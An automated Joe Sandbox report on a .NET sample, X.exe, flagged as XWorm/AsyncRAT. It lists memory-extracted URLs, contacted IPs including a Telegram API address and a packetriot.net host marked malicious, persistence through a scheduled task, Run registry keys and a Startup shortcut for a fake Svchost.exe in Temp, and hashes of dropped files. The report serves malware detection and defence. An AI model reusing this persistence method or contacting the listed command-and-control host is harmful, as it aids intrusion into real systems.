                                                                                                                          high
                                                                                                                          https://login.microsoftonline.com/ppsecure/DeviceAssociate.srfsvchost.exe, 00000012.00000003.4013719867.00000152D093B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://account.live.com/Wizard/Password/Change?id=80601svchost.exe, 00000012.00000002.4521095412.00000152D005F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013433507.00000152D092C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013719867.00000152D093B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013433507.00000152D0929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4014124615.00000152D0956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013575095.00000152D0952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdlns:psvchost.exe, 00000012.00000003.4031942080.00000152D0953000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/scsvchost.exe, 00000012.00000002.4521525759.00000152D0913000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521577838.00000152D095F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4056518662.00000152D0966000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://account.live.com/inlinesignup.aspx?iww=1&id=80601svchost.exe, 00000012.00000003.4013719867.00000152D093B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521071939.00000152D0045000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAAAAAsvchost.exe, 00000012.00000003.4039112538.00000152D0955000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://account.live.com/inlinesignup.aspx?iww=1&id=80600svchost.exe, 00000012.00000003.4013719867.00000152D093B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521071939.00000152D0045000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdcuritysvchost.exe, 00000012.00000003.4046777825.00000152D0953000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046596064.00000152D0952000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issuesvchost.exe, 00000012.00000002.4521622170.00000152D096F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046796242.00000152D096E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046462354.00000152D096D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAsvchost.exe, 00000012.00000003.4032113255.00000152D090E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521505766.00000152D090F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046392383.00000152D0907000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046671128.00000152D090E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://login.microsoftonline.com/ppsecure/DeviceUpdate.srfsvchost.exe, 00000012.00000003.4013719867.00000152D093B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/scerencesvchost.exe, 00000012.00000002.4521550829.00000152D0937000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://login.ecursvchost.exe, 00000012.00000002.4521071939.00000152D0045000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://account.live.com/inlinesignup.aspx?iww=1&id=80605svchost.exe, 00000012.00000002.4521095412.00000152D005F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfREsvchost.exe, 00000012.00000003.4013536862.00000152D0910000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsa=svchost.exe, 00000012.00000003.4046777825.00000152D0953000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046596064.00000152D0952000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://account.live.com/inlinesignup.aspx?iww=1&id=80603svchost.exe, 00000012.00000002.4521095412.00000152D005F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013719867.00000152D093B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://account.live.com/inlinesignup.aspx?iww=1&id=80604svchost.exe, 00000012.00000002.4521095412.00000152D005F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdsvchost.exe, 00000012.00000003.4046671128.00000152D090E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4031942080.00000152D0953000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046617502.00000152D095C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
IP               Domain                          Country         ASN    ASN Name            Malicious
149.154.167.220  api.telegram.org                United Kingdom  62041  TELEGRAMRU          false
167.71.56.116    eu-central-7075.packetriot.net  United States   14061  DIGITALOCEAN-ASNUS  true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1387988
Start date and time: 2024-02-07 03:21:06 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 55s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 19
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: X.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@18/10@5/2
                                                                                                                                                              EGA Information:Failed
                                                                                                                                                              HCA Information:
                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                              • Number of executed functions: 105
                                                                                                                                                              • Number of non-executed functions: 0
                                                                                                                                                              Cookbook Comments:
                                                                                                                                                              • Found application associated with file extension: .exe
                                                                                                                                                              • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 20.190.157.11, 40.126.29.14, 40.126.29.15, 40.126.29.10, 40.126.29.9, 40.126.29.8, 40.126.29.11, 40.126.29.6, 13.89.179.12
                                                                                                                                                              • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, www.tm.v4.a.prd.aadg.akadns.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                                                                                                              • Execution Graph export aborted for target Svchost.exe, PID 1176 because it is empty
                                                                                                                                                              • Execution Graph export aborted for target Svchost.exe, PID 3088 because it is empty
                                                                                                                                                              • Execution Graph export aborted for target Svchost.exe, PID 5632 because it is empty
                                                                                                                                                              • Execution Graph export aborted for target Svchost.exe, PID 5896 because it is empty
                                                                                                                                                              • Execution Graph export aborted for target Svchost.exe, PID 6256 because it is empty
                                                                                                                                                              • Execution Graph export aborted for target Svchost.exe, PID 6460 because it is empty
                                                                                                                                                              • Execution Graph export aborted for target Svchost.exe, PID 6884 because it is empty
                                                                                                                                                              • Execution Graph export aborted for target X.exe, PID 7096 because it is empty
• Not all processes were analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
Time      Type             Description
03:21:57  Task Scheduler   Run new task: Svchost path: C:\Users\user\AppData\Local\Temp\Svchost.exe
03:21:57  API Interceptor  9957094x Sleep call for process: X.exe modified
03:21:57  Autostart        Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Svchost C:\Users\user\AppData\Local\Temp\Svchost.exe
03:22:07  Autostart        Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Svchost C:\Users\user\AppData\Local\Temp\Svchost.exe
03:22:15  Autostart        Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Svchost.lnk
03:25:10  API Interceptor  1x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                                      • 157.245.157.99
                                                                                                                                                                                                      MDE_File_Sample_c30dd28cb119f2aa20ddabe8968b8cadbe80bcb2.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                      • 167.99.235.203
                                                                                                                                                                                                      SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                      • 167.71.56.116
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | IMG-01-22-20148398239999823489282222_pdf.JS | malicious | AMSIReaper, AgentTesla | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | GuCuJjOs5c.exe | malicious | DCRat, PureLog Stealer, zgRAT | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | SecuriteInfo.com.Win32.PWSX-gen.25288.2891.exe | malicious | AgentTesla | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | https://194.26.29.99:9443/updates.rss | malicious | Unknown | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | Al Adrak-RFQ-FEB-2024_PDF.scr.exe | malicious | AgentTesla | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | Pitsn.exe | malicious | AgentTesla, PureLog Stealer | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | SecuriteInfo.com.Win32.PWSX-gen.12031.21211.exe | malicious | AgentTesla | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | file.exe | malicious | Unknown | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | New order.exe | malicious | AgentTesla, PureLog Stealer, RedLine | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | uche.exe | malicious | AgentTesla, PureLog Stealer, RedLine | 149.154.167.220
Match | Associated Sample Name / URL | Detection | Threat Name | Context
C:\Users\user\AppData\Local\Temp\Svchost.exe | SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe | malicious | XWorm |
                                                                                                                                                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):65536
                                                                                                                                                                                                        Entropy (8bit):1.4337782823391478
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:8dDR5Xek081iHpaWz8iyXECll29IzuiFkZ24lO83nY:a7X281iJa48iXy2SzuiFkY4lO83
                                                                                                                                                                                                        MD5:3D0287B192368C8033BF5405A7CB7A91
                                                                                                                                                                                                        SHA1:3CDEB6AE2A7C0C2CB7B45B9B20F97F8496EDA640
                                                                                                                                                                                                        SHA-256:A2CF780792EE437752395CC58ACA602222FD5AC4D3AF1F9BE99B8AEA3353E8C2
                                                                                                                                                                                                        SHA-512:7E7FA8347AACE42B7F400A06A4FEC3FCD215900B60D26F9B505AF25E5083C73E0BA1E73FF28AAA0A984C4B0477E315DFD976597A926881C907F5BA913934481D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                        File Type:Mini DuMP crash report, 16 streams, Wed Feb 7 02:25:05 2024, 0x1205a4 type
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):567109
                                                                                                                                                                                                        Entropy (8bit):2.944583883933173
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:XtdNB0eWXlYqGY3Qo3i52tgyZZ512XVoHw7okzPI1hzSDpm1j:XNseqGMQoGo/X
                                                                                                                                                                                                        MD5:BC824AFD350C6B19107C8BDCE1962AB8
                                                                                                                                                                                                        SHA1:506BD12DF00071FE2819EBC87B4A12F168BF2045
                                                                                                                                                                                                        SHA-256:CAFDAFBC8824B475E23CADF137CF5EEC4E36732B3222E6065E42660DE89B0A57
                                                                                                                                                                                                        SHA-512:CDD0BD7669779AA96345502565CDEA5945E6934FD67A6E63F62140077EECEA33AE3FA994E336BF2A6FA68713294235048454522B5FE994D3A9E4CF57AD6F6BB5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):8888
                                                                                                                                                                                                        Entropy (8bit):3.6998852811060123
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:R6l7wVeJpyZV5E6Y2DuTgmfZN8npr/89bQFQejfuQm:R6lXJcZV66YTTgmfDTQCejfg
                                                                                                                                                                                                        MD5:82E4A83CAF53A44EE6A7C5A6BA158FC3
                                                                                                                                                                                                        SHA1:867E4BF65A047435B7BBF30C94C2EAA618117A06
                                                                                                                                                                                                        SHA-256:673B75BB03BB0C41E9A7466CB98BEB61839178CFC0E8C32DD7A6A7B775414C9A
                                                                                                                                                                                                        SHA-512:453007EB22B89EB92B08CAA0BAE610779A957B6BDCEA1C8177EF5236B3E1DD3808CA39E2BD25452678228F4E448C0167EDAB6BC87FE5C24B693C92B668BCC12E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):4717
                                                                                                                                                                                                        Entropy (8bit):4.417876421283829
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:cvIwWl8zssJg771I9wbWpW8VYZYm8M4JbEFlqyq8vVhYtCd:uIjfqI7Xq7VhJJWjYtCd
                                                                                                                                                                                                        MD5:E706F3B84A73BB7911ADB0AF51FC1F45
                                                                                                                                                                                                        SHA1:9D18759F6D868E60C98F46C07B8DB01480823B11
                                                                                                                                                                                                        SHA-256:41FB4ADA00E3B3DFA4440D9FC71DAEC96B52B03C2C2F6B2DCA6BE8D695CD7884
                                                                                                                                                                                                        SHA-512:E401767F14633DBB19E7A5F4CEA9155FF6F8FF1E0379EE7DF49D5AB68B4E9B055E56452131DBD18EC9D30906DDAA4E93512D00705BE755F11830A9C64A5D6CA2
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):72594
                                                                                                                                                                                                        Entropy (8bit):3.0998014819683593
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:wD6ITG3zghmRccxLQr76VnSGxYGu41otGYx8skk6eQsR4R3:wD6ITG3zghmRccxLQreVnSGxYGu41otm
                                                                                                                                                                                                        MD5:40EB42ED014150D8BDAF802A2C1C6A1D
                                                                                                                                                                                                        SHA1:B002001B919BD65A0ACE5C54C25DE6DC8A77BEC4
                                                                                                                                                                                                        SHA-256:630CDB5FCA04ED1B7103C9FA20DAD5303DCF730312EC62B3985166E621C99B37
                                                                                                                                                                                                        SHA-512:6CDA2405305582FFA418D4560B0FCF7170EE9B3D63F79E36C7EF98AA028B5AC70200ED2C1ADCB513521BA2369F7864C3144A170596B713EF66ECFD1CCF396367
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):13340
                                                                                                                                                                                                        Entropy (8bit):2.6851294232856397
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:TiZYWev25pXYuYWWWmdpHBUYEZrBtFir+I6cwV/Mz1aDdlMleonI2m3:2ZDPZNhg1aDdlMleoI2m3
                                                                                                                                                                                                        MD5:0A7C54469DB90B03C85AD9B6E2B6E17B
                                                                                                                                                                                                        SHA1:AF25BFA175E61C31CFECAC8ECF4B88123A72CECC
                                                                                                                                                                                                        SHA-256:A7658FE2E7D1FC17674636D83A3176097FF837FE65555966482BCBE3BAD8E642
                                                                                                                                                                                                        SHA-512:314BC71C324CFFD0B6AAA2383ABCBF3C4C86C83D91E430E560E70EBD28DACEC46AC72F216CBE6C90024478C459701DFC31BAA2BF4B1F0985833DDABE40642A54
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\Svchost.exe
                                                                                                                                                                                                        File Type:CSV text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):654
                                                                                                                                                                                                        Entropy (8bit):5.380476433908377
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                                                                                                                                                        MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                                                                                                                                                        SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                                                                                                                                                        SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                                                                                                                                                        SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\X.exe
                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):36864
                                                                                                                                                                                                        Entropy (8bit):5.5767765436987435
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:zDf+ZLVzkPLie7Vs6Ji5YYFg9KDO/hg/l193T:f+PzILv7di/Fg9KDO/Cd1dT
                                                                                                                                                                                                        MD5:F57EC853B0F01B0E9954CFBF8FEEB081
                                                                                                                                                                                                        SHA1:F0197D2DA76F563373686DD104305D1EEB21EC7C
                                                                                                                                                                                                        SHA-256:3D07268C23490174416EF5A8061E318B5B8B820CB89B27803996085C3B3EE927
                                                                                                                                                                                                        SHA-512:72593F450A183A53C81A70F9C23AB0EBA4CE46C64C3713F64A6606A3F3344305DFBE3D747FDE2C5353BCB6463EEEFC9B3B0B29395FEB9D71BC540A8D451A72AF
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\Svchost.exe, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\Svchost.exe, Author: Joe Security
                                                                                                                                                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\Svchost.exe, Author: ditekSHen
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 82%
                                                                                                                                                                                                        • Antivirus: Virustotal, Detection: 79%, Browse
                                                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                                                        • Filename: SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe, Detection: malicious, Browse
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\X.exe
                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Feb 7 01:21:55 2024, mtime=Wed Feb 7 01:21:55 2024, atime=Wed Feb 7 01:21:55 2024, length=36864, window=hide
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1055
                                                                                                                                                                                                        Entropy (8bit):4.9692562478751325
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:8cu/cvDEilX1JXLeRtgKaKAtak17i7qygm:8cukvDHlT7eRGAk1Vyg
                                                                                                                                                                                                        MD5:C4B9F6B1A48EFE95E560323EDB1F2E62
                                                                                                                                                                                                        SHA1:8171D08E54023990DC75AEF5F90060E80B3B626C
                                                                                                                                                                                                        SHA-256:D00F171A13E2673CB479585CAC7BA9F4CC9DB75A6A8FFDA395508D8936DC3EB5
                                                                                                                                                                                                        SHA-512:FB0C2C7BE7280205660C43C48A3EA56305077208BE2E6FA79A627F03EF8550B404C3F304C50479307FF453D399BBA463D2FC85C8B61CAC990CF24C2C774EAB7C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:L..................F.... ...".bklY..".bklY..".bklY............................:..DG..Yr?.D..U..k0.&...&.......$..S....dlY..M.klY......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2GX.............................^.A.p.p.D.a.t.a...B.P.1.....GX....Local.<......EW<2GX......[......................J..L.o.c.a.l.....N.1.....GX....Temp..:......EW<2GX......^......................!%.T.e.m.p.....b.2.....GX.. .Svchost.exe.H......GX..GX......S......................Y^.S.v.c.h.o.s.t...e.x.e......._...............-.......^...........x........C:\Users\user\AppData\Local\Temp\Svchost.exe..(.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.S.v.c.h.o.s.t...e.x.e.............:...........|....I.J.H..K..:...`.......X.......783875...........hT..CrF.f4... .B...Jc...-...-$..hT..CrF.f4... .B...Jc...-...-$.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.........9...1SPS..
                                                                                                                                                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1835008
                                                                                                                                                                                                        Entropy (8bit):4.468517395503153
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:lzZfpi6ceLPx9skLmb0ftZWSP3aJG8nAgeiJRMMhA2zX4WABluuNzjDH5S:dZHttZWOKnMM6bFpdj4
                                                                                                                                                                                                        MD5:73207BB482D02882C7BA9B8A018E0F65
                                                                                                                                                                                                        SHA1:BCEF05F2F9AA1F943B5816BB8AF134C18BD6A536
                                                                                                                                                                                                        SHA-256:7D0F8024700DB1D3597173F7030E9B5B49211E59914638B0402983DD2C72633A
                                                                                                                                                                                                        SHA-512:7A1D2B2F4F8847CA8B8CB85652074237B7DC9086ED8E80A71FAE2F28A8345D513C3E5E462E806161436788037E98C589C8FFA1AE11AB5A9F69C69321318E7B73
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm^.a.lY................................................................................................................................................................................................................................................................................................................................................v.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                        Entropy (8bit):5.5767765436987435
                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                                                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                                                        • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                                        File name:X.exe
                                                                                                                                                                                                        File size:36'864 bytes
